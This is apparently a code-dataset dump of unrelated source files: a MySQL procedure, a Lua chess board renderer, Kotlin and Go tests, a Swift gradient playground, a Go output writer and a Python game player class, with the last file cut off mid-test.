] | null | null | null | procedures/saveServantInfo.sql | sir-nutty/myChaldea-DB | 796d9f76d7dd64eff2923c92f0031589573d9c60 | [
"MIT"
] | null | null | null | procedures/saveServantInfo.sql | sir-nutty/myChaldea-DB | 796d9f76d7dd64eff2923c92f0031589573d9c60 | [
"MIT"
] | null | null | null | CREATE DEFINER=`admin`@`10.150.0.2` PROCEDURE `saveServantInfo`(IN
user_uid VARCHAR(100),
servantName VARCHAR(100),
servantID SMALLINT,
servantType VARCHAR(30),
servantLevel TINYINT,
servantWiki VARCHAR(100),
servantFandom VARCHAR(100))
BEGIN
/*Changelog:
- 02/02/2021: Added isAdmin check.*/
DECLARE isAdmin, isServantExist, isError BOOLEAN;
DECLARE class_ID, curr_class_ID, servant_level, curr_servant_level, rarity_ID TINYINT;
DECLARE servant_name VARCHAR(100);
SET isAdmin = (SELECT getIsUserAdmin(user_uid));
IF (isAdmin) THEN -- Only proceed if user is an admin
SET class_ID = (SELECT `id` FROM `mychaldea`.`class` WHERE `name` = servantType); -- Get class ID
CASE -- Get rarity ID
WHEN servantLevel < 3 THEN SET rarity_ID = 1; -- Bronze servant
WHEN servantLevel = 3 THEN SET rarity_ID = 2; -- Silver servant
WHEN servantLevel > 3 THEN SET rarity_ID = 3; -- Gold servant
END CASE;
SET isServantExist = (SELECT IF((SELECT COUNT(*) FROM servant WHERE id = servantID OR name = servantName) > 0, TRUE, FALSE)); -- Check if servant exists
SET isError = (SELECT IF((SELECT COUNT(*) FROM servant WHERE id = servantID AND name = servantName) > 0, FALSE, TRUE)); -- Check if servant is in error
-- Save Servant
IF (!isServantExist) THEN -- Servant doesn't exist, insert it
INSERT INTO `mychaldea`.`servant` (`id`, `classID`, `name`, `star_Level`, `rarityID`) VALUES (servantID, class_ID, servantName, servantLevel, rarity_ID); -- Add to Servant
CALL saveServantLink(servantID, 1, servantWiki); -- Add Wiki Link
CALL saveServantLink(servantID, 2, servantFandom); -- Add Fandom Link
ELSE -- Servant doesn't exist. Proceed to update.
IF (!isError) THEN -- Servant to update isn't in error. Proceed.
SET curr_class_ID = (SELECT `classID` FROM `mychaldea`.`servant` WHERE `id` = servantID);
IF (curr_class_ID != class_ID || curr_class_ID IS NULL) THEN -- Servant class is different. Update class.
UPDATE `mychaldea`.`servant` SET `classID` = class_ID WHERE (`id` = servantID);
END IF;
SET curr_servant_level = (SELECT `star_Level` FROM `mychaldea`.`servant` WHERE `id` = servantID);
IF (curr_servant_level != servantLevel || curr_servant_level IS NULL) THEN -- Servant level is different. Update level & rarity.
UPDATE `mychaldea`.`servant` SET `star_Level` = servantLevel WHERE (`id` = servantID);
UPDATE `mychaldea`.`servant` SET `rarityID` = rarity_ID WHERE (`id` = servantID);
END IF;
CALL saveServantLink(servantID, 1, servantWiki); -- Add Wiki Link
CALL saveServantLink(servantID, 2, servantFandom); -- Add Fandom Link
END IF;
END IF;
END IF;
END | 52.057692 | 174 | 0.700406 | 3.140625 |
e72d543325127793a428caa4bb50e28f374dcb4c | 11,270 | lua | Lua | Board.lua | AhmedDawoud3/Chess-Love2D | c2555dd61d13d4e1fd2e8b218f874fab012b8c86 | [
"MIT"
] | null | null | null | Board.lua | AhmedDawoud3/Chess-Love2D | c2555dd61d13d4e1fd2e8b218f874fab012b8c86 | [
"MIT"
] | null | null | null | Board.lua | AhmedDawoud3/Chess-Love2D | c2555dd61d13d4e1fd2e8b218f874fab012b8c86 | [
"MIT"
] | null | null | null | lightCol = {241 / 255, 217 / 255, 192 / 255, 1}
darkCol = {169 / 255, 122 / 255, 101 / 255, 1}
WIDTH = 960
HEIGHT = 960
squareTileWidth = WIDTH / 8
squareTileHeight = HEIGHT / 8
local queenShadow = 0
local rookShadow = 0
local knightShadow = 0
local bishopShadow = 0
function CreateGraphicalBoard()
for file = 0, 7 do
for rank = 0, 7 do
isLightSquare = (file + rank) % 2 ~= 0
squareColour = (isLightSquare and darkCol) or lightCol
position = {file, rank}
DrawSquare(squareColour, position)
love.graphics.setColor(1, 1, 1, 1)
end
end
end
function DrawSquare(col, pos)
love.graphics.setColor(col[1], col[2], col[3], col[4])
love.graphics.rectangle("fill", pos[1] * squareTileWidth, pos[2] * squareTileHeight, squareTileWidth,
squareTileHeight)
love.graphics.setColor(1, 1, 1, 1)
end
Board = Class {}
function Board:init()
self.Square = {}
self.LightPieces = {}
self.DarkPieces = {}
self.kingSquare = {}
for i = 1, 64 do
self.Square[i] = {0, false, true}
end
end
function Board:DisplayPieces()
for i, v in ipairs(self.Square) do
if v[1] ~= 0 then
local p = Loader:GetPiece(v[1])
if p ~= nil and v[2] then
local x, y = SquareToCordinate(i)
love.graphics.draw(Loader.piecesTexture, p, x, y)
end
end
end
if floatingPiece then
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(floatingPiece[1]), floatingPiece[2][1] - 60,
floatingPiece[2][2] - 60)
end
end
function Board:DisplayLastMoves()
DrawSquare({0.78, 0.78, 0.24, 0.5},
{FileIndex(oldMoves[#oldMoves].StartSquare), RankIndex(oldMoves[#oldMoves].StartSquare)})
DrawSquare({0.78, 0.78, 0.24, 0.7},
{FileIndex(oldMoves[#oldMoves].TargetSquare), RankIndex(oldMoves[#oldMoves].TargetSquare)})
end
function Board:DisplayLegalMoves()
for i, v in ipairs(moves) do
if v then
DrawSquare({0.8, 0.1, 0.2, 0.7}, {FileIndex(v.TargetSquare), RankIndex(v.TargetSquare)})
end
end
if selectedPieceSquare and #moves > 0 then
DrawSquare({1, 0.65, 0.2, 0.8}, {FileIndex(selectedPieceSquare), RankIndex(selectedPieceSquare)})
end
end
function Board:DisplayChecks()
if IsCheck(Piece().Black) then
DrawSquare({0.4, 0.8, 0.2, 0.7}, {FileIndex(IsCheck(Piece().Black)[2]), RankIndex(IsCheck(Piece().Black)[2])})
end
if IsCheck(Piece().White) then
DrawSquare({0.4, 0.8, 0.2, 0.7}, {FileIndex(IsCheck(Piece().White)[2]), RankIndex(IsCheck(Piece().White)[2])})
end
end
function Board:GetPiecePromotion()
if Game.promotionAvalible == true then
local col = Game.promotionColor == Piece().White and Piece().Black or Piece().White
local mouseX = love.mouse.getX()
local mouseY = love.mouse.getY()
love.mouse.setCursor()
love.graphics.setColor(0.1, 0.1, 0.1, 0.7)
love.graphics.rectangle("fill", 0, 0, 960, 960)
-- Queen
love.graphics.setColor(((241 + 168) / 2) / 255 + queenShadow / 50, ((217 + 122) / 2) / 255 + queenShadow / 50,
((192 + 101) / 2) / 255 + queenShadow / 100, 1)
love.graphics.rectangle("fill", 1 * squareTileWidth, 2 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
love.graphics.setColor(0, 0, 0, 0.7)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Queen, col)),
1 * squareTileWidth + squareTileWidth / 4 - queenShadow,
2 * squareTileHeight + squareTileHeight / 4 + queenShadow, 0, 1.5, 1.5)
love.graphics.setColor(1, 1, 1, 1)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Queen, col)),
1 * squareTileWidth + squareTileWidth / 4, 2 * squareTileHeight + squareTileHeight / 4, 0, 1.5, 1.5)
love.graphics.setColor(0, 0, 0, 1)
love.graphics.setLineWidth(5)
love.graphics.rectangle("line", 1 * squareTileWidth, 2 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
if CheckMouseCollision(mouseX, mouseY, squareTileWidth, 2 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2) then
queenShadow = math.min(queenShadow + 1, 10)
love.mouse.setCursor((love.mouse.getSystemCursor("hand")))
if love.mouse.isDown(1) then
love.mouse.setCursor()
Piece().Promote(bit.bor(Piece().Queen, col))
queenShadow = 0
end
else
queenShadow = math.max(queenShadow - 1, 0)
end
-- Rook
love.graphics.setColor(((241 + 168) / 2) / 255 + rookShadow / 50, ((217 + 122) / 2) / 255 + rookShadow / 50,
((192 + 101) / 2) / 255 + rookShadow / 100, 1)
love.graphics.rectangle("fill", 5 * squareTileWidth, 2 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
love.graphics.setColor(0, 0, 0, 0.7)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Rook, col)),
5 * squareTileWidth + squareTileWidth / 4 - rookShadow,
2 * squareTileHeight + squareTileHeight / 4 + rookShadow, 0, 1.5, 1.5)
love.graphics.setColor(1, 1, 1, 1)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Rook, col)),
5 * squareTileWidth + squareTileWidth / 4, 2 * squareTileHeight + squareTileHeight / 4, 0, 1.5, 1.5)
love.graphics.setColor(0, 0, 0, 1)
love.graphics.setLineWidth(5)
love.graphics.rectangle("line", 5 * squareTileWidth, 2 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
if CheckMouseCollision(mouseX, mouseY, 5 * squareTileWidth, 2 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2) then
rookShadow = math.min(rookShadow + 1, 10)
love.mouse.setCursor((love.mouse.getSystemCursor("hand")))
if love.mouse.isDown(1) then
love.mouse.setCursor()
Piece().Promote(bit.bor(Piece().Rook, col))
rookShadow = 0
end
else
rookShadow = math.max(rookShadow - 1, 0)
end
-- Bishop
love.graphics.setColor(((241 + 168) / 2) / 255 + bishopShadow / 50, ((217 + 122) / 2) / 255 + bishopShadow / 50,
((192 + 101) / 2) / 255 + bishopShadow / 100, 1)
love.graphics.rectangle("fill", 1 * squareTileWidth, 5 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
love.graphics.setColor(0, 0, 0, 0.7)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Bishop, col)),
1 * squareTileWidth + squareTileWidth / 4 - bishopShadow,
5 * squareTileHeight + squareTileHeight / 4 + bishopShadow, 0, 1.5, 1.5)
love.graphics.setColor(1, 1, 1, 1)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Bishop, col)),
1 * squareTileWidth + squareTileWidth / 4, 5 * squareTileHeight + squareTileHeight / 4, 0, 1.5, 1.5)
love.graphics.setColor(0, 0, 0, 1)
love.graphics.setLineWidth(5)
love.graphics.rectangle("line", 1 * squareTileWidth, 5 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
if CheckMouseCollision(mouseX, mouseY, squareTileWidth, 5 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2) then
bishopShadow = math.min(bishopShadow + 1, 10)
love.mouse.setCursor((love.mouse.getSystemCursor("hand")))
if love.mouse.isDown(1) then
love.mouse.setCursor()
bishopShadow = 0
Piece().Promote(bit.bor(Piece().Bishop, col))
end
else
bishopShadow = math.max(bishopShadow - 1, 0)
end
-- Knight
love.graphics.setColor(((241 + 168) / 2) / 255 + knightShadow / 50, ((217 + 122) / 2) / 255 + knightShadow / 50,
((192 + 101) / 2) / 255 + knightShadow / 100, 1)
love.graphics.rectangle("fill", 5 * squareTileWidth, 5 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
love.graphics.setColor(0, 0, 0, 0.7)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Knight, col)),
5 * squareTileWidth + squareTileWidth / 4 - knightShadow,
5 * squareTileHeight + squareTileHeight / 4 + knightShadow, 0, 1.5, 1.5)
love.graphics.setColor(1, 1, 1, 1)
love.graphics.draw(Loader.piecesTexture, Loader:GetPiece(bit.bor(Piece().Knight, col)),
5 * squareTileWidth + squareTileWidth / 4, 5 * squareTileHeight + squareTileHeight / 4, 0, 1.5, 1.5)
love.graphics.setColor(0, 0, 0, 1)
love.graphics.setLineWidth(5)
love.graphics.rectangle("line", 5 * squareTileWidth, 5 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2, 50, 50)
love.graphics.setLineWidth(1)
if CheckMouseCollision(mouseX, mouseY, 5 * squareTileWidth, 5 * squareTileHeight, squareTileWidth * 2,
squareTileHeight * 2) then
knightShadow = math.min(knightShadow + 1, 10)
love.mouse.setCursor((love.mouse.getSystemCursor("hand")))
if love.mouse.isDown(1) then
love.mouse.setCursor()
Piece().Promote(bit.bor(Piece().Knight, col))
knightShadow = 0
end
else
knightShadow = math.max(knightShadow - 1, 0)
end
end
end
function Board:LoadStartPosition()
Board:LoadPosition(startFen)
end
function Board:LoadPosition(fen)
loadedPosition = PositionFromFen(fen)
Game.Board.LightPieces = {}
Game.Board.DarkPieces = {}
local pec = Piece()
local isCLR = pec.IsColor
local pTYPE = pec.PieceType
for squareIndex = 1, 64 do
piece = loadedPosition.squares[squareIndex]
Game.Board.Square[squareIndex][1] = piece
Game.Board.Square[squareIndex][2] = true
Game.Board.Square[squareIndex][3] = false
if piece ~= 0 then
if isCLR(piece, pec.White) then
table.insert(Game.Board.LightPieces, squareIndex)
if pTYPE(piece) == pec.King then
Game.Board.kingSquare['w'] = squareIndex
end
else
table.insert(Game.Board.DarkPieces, squareIndex)
if pTYPE(piece) == pec.King then
Game.Board.kingSquare['b'] = squareIndex
end
end
end
end
Game.turn = loadedPosition.turn
Game.wkcstl = loadedPosition.whiteCastleKingside
Game.wqcstl = loadedPosition.whiteCastleQueenside
Game.bkcstl = loadedPosition.blackCastleKingside
Game.bqcstl = loadedPosition.blackCastleQueenside
Game.epFile = loadedPosition.epFile
end
function CheckMouseCollision(x, y, x2, y2, width, height)
if x < x2 + width and x > x2 and y < y2 + height and y > y2 then
return true
end
return false
end
| 43.682171 | 120 | 0.607986 | 3.375 |
bbdb03c3f539663a7877265fcd39ede110c4a621 | 1,141 | kt | Kotlin | main/src/test/kotlin/de/richargh/sandbox/spock/strongtypes/PersonTest.kt | Richargh/spock-strong-types-krdl-kt-sandbox | 5e4307dc43eda04f61de83c141267f9a7eb8fe54 | [
"MIT"
] | null | null | null | main/src/test/kotlin/de/richargh/sandbox/spock/strongtypes/PersonTest.kt | Richargh/spock-strong-types-krdl-kt-sandbox | 5e4307dc43eda04f61de83c141267f9a7eb8fe54 | [
"MIT"
] | null | null | null | main/src/test/kotlin/de/richargh/sandbox/spock/strongtypes/PersonTest.kt | Richargh/spock-strong-types-krdl-kt-sandbox | 5e4307dc43eda04f61de83c141267f9a7eb8fe54 | [
"MIT"
] | null | null | null | package de.richargh.sandbox.spock.strongtypes
import org.assertj.core.api.Assertions.assertThat
import org.assertj.core.api.Assertions.catchThrowable
import org.junit.jupiter.params.ParameterizedTest
import org.junit.jupiter.params.provider.CsvSource
import org.junit.jupiter.params.provider.ValueSource
internal class PersonTest {
@ParameterizedTest
@CsvSource(value = [
"John, 5, Reporter",
"Lisa, 2, Astronaut"])
fun `a persons age can never be less than 0`(
name: Name, age: Age, job: Job) {
// arrange
val testling = person {
withName(name)
withAge(age)
withJob(job)
}
// act
val thrown = catchThrowable { testling.changeAge(Age(-1)) }
// assert
assertThat(thrown).isInstanceOf(IllegalArgumentException::class.java)
}
@ParameterizedTest
@ValueSource(strings = [
"John",
"Lisa"])
fun `all names are allowed`(
@ConvertNameToPerson testling: Person) {
// arrange
// act
// assert
assertThat(testling.name).isNotNull
}
} | 25.931818 | 77 | 0.624014 | 3.03125 |
4ac3050ee1afc7cc157d450e529e2b9b151e51c2 | 2,092 | swift | Swift | playgrounds/ChangingGradientView.playground/Contents.swift | Changzw/every-case-demo | 0ba08146fee2904bd2151fcea8041f03b8b86e71 | [
"Apache-2.0"
] | null | null | null | playgrounds/ChangingGradientView.playground/Contents.swift | Changzw/every-case-demo | 0ba08146fee2904bd2151fcea8041f03b8b86e71 | [
"Apache-2.0"
] | null | null | null | playgrounds/ChangingGradientView.playground/Contents.swift | Changzw/every-case-demo | 0ba08146fee2904bd2151fcea8041f03b8b86e71 | [
"Apache-2.0"
] | null | null | null | //: A UIKit based Playground for presenting user interface
import UIKit
import PlaygroundSupport
extension UIColor {
convenience init(AHEX string: String) {
var hex = string.hasPrefix("#")
? String(string.dropFirst())
: string
guard hex.count == 8 || hex.count == 6
else {
self.init(white: 1.0, alpha: 1)
return
}
if hex.count == 6 {
hex = "FF" + hex
}
guard let intCode = Int(hex, radix: 16) else {
self.init(white: 1.0, alpha: 1)
return
}
let divisor: CGFloat = 255
let alpha = CGFloat((intCode >> 24) & 0xFF) / divisor
let red = CGFloat((intCode >> 16) & 0xFF) / divisor
let green = CGFloat((intCode >> 8 ) & 0xFF) / divisor
let blue = CGFloat((intCode ) & 0xFF) / divisor
self.init(red: red, green: green, blue: blue, alpha: alpha)
}
}
class MyViewController : UIViewController {
var timer: DispatchSourceTimer?
let gradientLayer = CAGradientLayer()
override func loadView() {
super.loadView()
let view = UIView()
gradientLayer.startPoint = .zero
gradientLayer.endPoint = CGPoint(x: 1, y: 0)
gradientLayer.colors = [UIColor(AHEX: "#\(String(Int.random(in: 0...255), radix: 16))"),
UIColor(AHEX: "#\(String(Int.random(in: 0...255), radix: 16))")].map(\.cgColor)
self.view = view
timer = DispatchSource.makeTimerSource(flags: .strict, queue: DispatchQueue.main)
timer?.setEventHandler { [weak self] in
guard let self = self else { return }
self.gradientLayer.colors = [UIColor(AHEX: "#\(String(Int.random(in: 0...255), radix: 16))"),
UIColor(AHEX: "#\(String(Int.random(in: 0...255), radix: 16))")].map(\.cgColor)
}
timer?.schedule(deadline: .now() + .seconds(1), repeating: .seconds(1))
timer?.activate()
}
override func viewDidLoad() {
super.viewDidLoad()
view.layer.addSublayer(gradientLayer)
}
}
// Present the view controller in the Live View window
PlaygroundPage.current.liveView = MyViewController()
| 31.69697 | 109 | 0.611377 | 3.375 |
c3ace8ba54a76ce1d4317369067e467e8db166ed | 1,154 | go | Go | cmd/output.go | mickep76/grpc-exec-example | fd6794a634bdbb6b5f12e173017729bdeb3ba2b8 | [
"Apache-2.0"
] | 3 | 2018-07-07T16:52:43.000Z | 2018-10-15T14:00:00.000Z | cmd/output.go | mickep76/grpc-exec-example | fd6794a634bdbb6b5f12e173017729bdeb3ba2b8 | [
"Apache-2.0"
] | null | null | null | cmd/output.go | mickep76/grpc-exec-example | fd6794a634bdbb6b5f12e173017729bdeb3ba2b8 | [
"Apache-2.0"
] | null | null | null | package cmd
import (
"bufio"
"bytes"
"io"
"time"
)
type Reader struct {
reader io.Reader
BytesRead int
}
func newReader(r io.Reader) *Reader {
return &Reader{reader: r}
}
func (r *Reader) Read(p []byte) (n int, err error) {
n, err = r.reader.Read(p)
r.BytesRead += n
return n, err
}
type Message struct {
Received time.Time
Line int
Stderr bool
Message string
}
type Writer struct {
line int
stderr bool
ch chan Message
}
func NewWriter() (*Writer, *Writer) {
ch := make(chan Message, 1024)
return &Writer{line: 0, stderr: false, ch: ch}, &Writer{line: 0, stderr: true, ch: ch}
}
func (w *Writer) Chan() <-chan Message {
return w.ch
}
func (w *Writer) Write(p []byte) (int, error) {
reader := newReader(bytes.NewReader(p))
scanner := bufio.NewScanner(reader)
for scanner.Scan() {
w.ch <- Message{
Received: time.Now(),
Line: w.line,
Stderr: w.stderr,
Message: scanner.Text(),
}
w.line++
}
if scanner.Err() != io.EOF && scanner.Err() != nil {
return reader.BytesRead, scanner.Err()
}
return reader.BytesRead, nil
}
func (w *Writer) Close() error {
close(w.ch)
return nil
}
| 16.724638 | 87 | 0.633449 | 3.078125 |
653275e0a6bf64ffd7bef701a34270c76bd37631 | 1,854 | py | Python | clisk/player/player.py | etano/clisk | 70067eb98568a97d896ee486bae56b49c77bcb11 | [
"MIT"
] | null | null | null | clisk/player/player.py | etano/clisk | 70067eb98568a97d896ee486bae56b49c77bcb11 | [
"MIT"
] | null | null | null | clisk/player/player.py | etano/clisk | 70067eb98568a97d896ee486bae56b49c77bcb11 | [
"MIT"
] | null | null | null | class Player(object):
"""Player class
Attributes:
name (str): Player name
"""
def __init__(self, name):
"""Initialize player
Args:
name (str): Player name
"""
self.name = name
def place_troops(self, board, n_troops):
"""Place troops on territories
Args:
board (Gameboard): The gameboard
n_troops (int): Number of new troops to deploy
Returns:
(dict(str, int)): Dictionary of territories with number of troops to be deployed
"""
raise NotImplementedError('place_troops not implemented')
def do_attack(self, board):
"""Decide whether or not to continue attacking
Args:
board (Gameboard): The gameboard
Returns:
(bool): Whether or not to continue attacking
"""
raise NotImplementedError('do_attack not implemented')
def attack(self, board):
"""Attack phase
Args:
board (Gameboard): The gameboard
Returns:
(str, str): from_territory, to_territory
"""
raise NotImplementedError('attack not implemented')
def do_move_troops(self, board):
"""Decide whether or not to move troops
Args:
board (Gameboard): The gameboard
Returns:
(bool): Whether or not to move troops
"""
raise NotImplementedError('do_move_troops not implemented')
def move_troops(self, board):
"""Troop movement phase
Args:
board (Gameboard): The gameboard
Returns:
(str, str, int): from_territory, to_territory, n_troops
"""
raise NotImplementedError('move_troops not implemented')
| 26.112676 | 95 | 0.553937 | 3.375 |
43a5562a14702b4fc51c7509a5011fd3afd8d942 | 9,708 | go | Go | delivery/consumer_test.go | openrelayxyz/cardinal-streams | 74f712e2933ab8ce06f965ff1fafa4011a06b115 | [
"MIT"
] | 1 | 2022-02-21T12:23:20.000Z | 2022-02-21T12:23:20.000Z | delivery/consumer_test.go | openrelayxyz/cardinal-streams | 74f712e2933ab8ce06f965ff1fafa4011a06b115 | [
"MIT"
] | null | null | null | delivery/consumer_test.go | openrelayxyz/cardinal-streams | 74f712e2933ab8ce06f965ff1fafa4011a06b115 | [
"MIT"
] | 1 | 2022-03-28T20:50:54.000Z | 2022-03-28T20:50:54.000Z | package delivery
import (
"time"
"testing"
"math/big"
"math/rand"
"github.com/openrelayxyz/cardinal-types"
// "strings"
"regexp"
"runtime"
)
type testResumptionMessage struct{
Message
offset int64
source string
}
func (r *testResumptionMessage) Offset() int64 { return r.offset }
func (r *testResumptionMessage) Source() string { return r.source }
func (r *testResumptionMessage) Time() time.Time { return time.Now() }
func toTestResumptionMessage(inputs... map[string][]Message) []ResumptionMessage {
offsets := make(map[string]int64)
result := []ResumptionMessage{}
for _, input := range inputs {
for k, msgs := range input {
for _, msg := range msgs {
result = append(result, &testResumptionMessage{Message: msg, offset: offsets[k], source: k})
offsets[k]++
}
}
}
return result
}
func TestConsumer(t *testing.T) {
p, err := NewProducer(
"default",
map[string]string{
"foo/": "foo",
"bar/[^/]+/baz/": "bar",
"state/thing": "state",
},
)
if err != nil { t.Errorf(err.Error()) }
mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
msgs, err := p.AddBlock(
0,
types.HexToHash("01"),
types.HexToHash("00"),
new(big.Int),
map[string][]byte{
"foo/something": []byte("gnihtemos/oof"),
"bar/whatever/baz/stuff": []byte("data"),
"default/thing": []byte("defaulttopic"),
},
map[string]struct{}{
"foo/delete": struct{}{},
"bar/delete/baz/thing": struct{}{},
"default/delete": struct{}{},
},
map[string]types.Hash{
"state/": types.HexToHash("ff"),
},
)
if err != nil { t.Fatalf(err.Error()) }
ch := make(chan *PendingBatch, 5)
sub := mp.Subscribe(ch)
defer sub.Unsubscribe()
msgList := toTestResumptionMessage(msgs)
for _, msg := range msgList {
if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
}
runtime.Gosched()
select {
case v := <-ch:
t.Errorf("Expected nothing on channel yet, got %v, %v, %v", v.pendingBatches, v.prefixes, v.batches)
default:
}
msgs, err = p.SendBatch(types.HexToHash("ff"), []string{"whatever/", "other/"}, map[string][]byte{"state/thing": []byte("thing!")})
if err != nil { t.Fatalf(err.Error()) }
msgList = toTestResumptionMessage(msgs)
for _, msg := range msgList {
if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
}
runtime.Gosched()
select {
case v := <-ch:
if v.Number != 0 { t.Errorf("Unexpected batch number") }
if v.Weight.Cmp(new(big.Int)) != 0 { t.Errorf("Unexpected weight") }
if v.ParentHash != types.HexToHash("00") { t.Errorf("Unexpected hash" ) }
if l := len(v.Values); l != 4 { t.Errorf("Unexpected updates length; Expected 4, got %v", l)} // 2 prefixes, 1 batch, 2 changes not in schema
if l := len(v.Deletes); l != 5 { t.Errorf("Unexpected deletes length; Expected 5, got %v", v.Deletes)} // 2 prefixes, 1 batch, 2 changes not in schema
default:
t.Errorf("Expected item on channel, nothing yet")
}
select {
case v := <-ch:
t.Errorf("Unexpected item on channel: %v", v)
default:
}
}
func getTestMessages(t *testing.T, blockCount int) []ResumptionMessage {
p, err := NewProducer(
"default",
map[string]string{
"foo/": "foo",
"bar/[^/]+/baz/": "bar",
"state/thing": "state",
},
)
if err != nil { t.Errorf(err.Error()) }
msgs := []map[string][]Message{}
for i := 1; i <= blockCount ; i++ {
blockHash := types.BytesToHash([]byte{byte(i)})
parentHash := types.BytesToHash([]byte{byte(i-1)})
batchid := types.BytesToHash([]byte{255, byte(i-1)})
m, err := p.AddBlock(
int64(i),
blockHash,
parentHash,
new(big.Int),
map[string][]byte{
"foo/something": []byte("gnihtemos/oof"),
"bar/whatever/baz/stuff": []byte("data"),
"default/thing": []byte("defaulttopic"),
},
map[string]struct{}{
"foo/delete": struct{}{},
"bar/delete/baz/thing": struct{}{},
"default/delete": struct{}{},
},
map[string]types.Hash{
"state/": batchid,
},
)
if err != nil { t.Fatalf(err.Error()) }
msgs = append(msgs, m)
m, err = p.SendBatch(batchid, []string{"whatever/", "other/"}, map[string][]byte{"state/thing": []byte("thing!")})
if err != nil { t.Fatalf(err.Error()) }
msgs = append(msgs, m)
}
return toTestResumptionMessage(msgs...)
}
func TestShuffled(t *testing.T) {
mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
ch := make(chan *PendingBatch, 5)
sub := mp.Subscribe(ch)
defer sub.Unsubscribe()
msgList := getTestMessages(t, 1)
rand.Seed(time.Now().UnixNano())
rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
for _, msg := range msgList[:] {
if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
}
runtime.Gosched()
select {
case v := <-ch:
if v.Number != 1 { t.Errorf("Unexpected batch number") }
if v.Weight.Cmp(new(big.Int)) != 0 { t.Errorf("Unexpected weight") }
if v.ParentHash != types.HexToHash("00") { t.Errorf("Unexpected hash" ) }
if l := len(v.Values); l != 4 { t.Errorf("Unexpected updates length; Expected 4, got %v", l)} // 2 prefixes, 1 batch, 2 changes not in schema
if l := len(v.Deletes); l != 5 { t.Errorf("Unexpected deletes length; Expected 5, got %v", v.Deletes)} // 2 prefixes, 1 batch, 2 changes not in schema
default:
t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
}
select {
case v := <-ch:
t.Errorf("Unexpected item on channel: %v", v)
default:
}
}
func TestShuffledDups(t *testing.T) {
mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
ch := make(chan *PendingBatch, 5)
sub := mp.Subscribe(ch)
defer sub.Unsubscribe()
msgList := getTestMessages(t, 1)
rand.Seed(time.Now().UnixNano())
rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
msgList = append(msgList, msgList[:len(msgList) / 4]...)
rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
for _, msg := range msgList[:] {
if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
}
runtime.Gosched()
select {
case v := <-ch:
if v.Number != 1 { t.Errorf("Unexpected batch number") }
if v.Weight.Cmp(new(big.Int)) != 0 { t.Errorf("Unexpected weight") }
if v.ParentHash != types.HexToHash("00") { t.Errorf("Unexpected hash" ) }
if l := len(v.Values); l != 4 { t.Errorf("Unexpected updates length; Expected 4, got %v", l)} // 2 prefixes, 1 batch, 2 changes not in schema
if l := len(v.Deletes); l != 5 { t.Errorf("Unexpected deletes length; Expected 5, got %v", v.Deletes)} // 2 prefixes, 1 batch, 2 changes not in schema
default:
t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
}
select {
case v := <-ch:
t.Errorf("Unexpected item on channel: %v", v)
default:
}
}
func TestShuffledDupsMultiBlock(t *testing.T) {
mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
ch := make(chan *PendingBatch, 5)
sub := mp.Subscribe(ch)
defer sub.Unsubscribe()
msgList := getTestMessages(t, 2)
rand.Seed(time.Now().UnixNano())
rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
msgList = append(msgList, msgList[:len(msgList) / 4]...)
rand.Shuffle(len(msgList), func(i, j int) { msgList[i], msgList[j] = msgList[j], msgList[i] })
for _, msg := range msgList[:] {
if err := mp.ProcessMessage(msg); err != nil { t.Errorf(err.Error()) }
}
runtime.Gosched()
select {
case <-ch:
default:
t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
}
select {
case <-ch:
default:
t.Errorf("Expected item on channel, nothing yet (%v) - %v", mp.pendingBatches[types.HexToHash("01")].whyNotReady(), msgList[len(msgList) - 1])
}
select {
case v := <-ch:
t.Errorf("Unexpected item on channel: %v", v)
default:
}
}
func TestConsumerReorg(t *testing.T) {
p, err := NewProducer(
"default",
map[string]string{
"foo/": "foo",
"bar/[^/]+/baz/": "bar",
"state/thing": "state",
},
)
if err != nil { t.Errorf(err.Error()) }
mp := NewMessageProcessor(0, 128, []*regexp.Regexp{regexp.MustCompile(".*")})
msgs, err := p.AddBlock(
0,
types.HexToHash("01"),
types.HexToHash("00"),
new(big.Int),
map[string][]byte{
